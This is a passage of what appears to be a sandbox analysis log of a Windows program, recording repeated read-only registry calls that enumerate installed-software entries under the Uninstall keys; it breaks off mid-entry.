    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000480
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000480
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000484
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x0000047c
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000470
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          AddressBook
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          Connection Manager
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          DirectDrawEx
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          EditPlus
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
